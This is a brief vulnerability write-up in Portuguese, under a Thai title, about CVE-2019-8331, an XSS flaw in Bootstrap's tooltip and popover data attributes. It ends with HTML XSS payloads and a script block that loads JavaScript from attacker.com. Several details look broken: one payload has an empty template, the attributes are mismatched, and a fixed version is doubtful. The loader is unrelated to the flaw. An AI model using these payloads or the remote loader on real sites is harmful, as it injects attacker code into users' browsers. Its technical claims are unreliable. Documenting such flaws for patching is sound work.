
ช่องโหว่ CVE-2019-8331
O CVE-2019-8331 é uma vulnerabilidade de segurança do tipo Cross-Site Scripting (XSS) encontrada no Bootstrap, uma biblioteca JavaScript amplamente utilizada no desenvolvimento de sites e aplicações móveis. Essa vulnerabilidade ocorre pois o Bootstrap não filtra adequadamente os dados enviados no atributo data-template dos elementos tooltip ou popover, permitindo que um invasor injete código malicioso na página.
Esse ataque pode ocorrer se o invasor conseguir controlar os dados que serão exibidos como tooltip ou popover. Quando o usuário ativar o tooltip ou popover, o código malicioso será injetado na página e poderá ser executado pelo navegador do usuário.
Essa vulnerabilidade foi corrigida no Bootstrap versões 4.3.1 e 5.0.0-beta2. Os administradores devem atualizar as versões afetadas do Bootstrap para corrigir essa vulnerabilidade.
Detalhes adicionais sobre a vulnerabilidade CVE-2019-8331:
<x data-toggle="tooltip" data-template="">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
<script>
var script = document.createElement("script");
script.src = "https://attacker.com/malicious.js";
document.body.appendChild(script);
</script>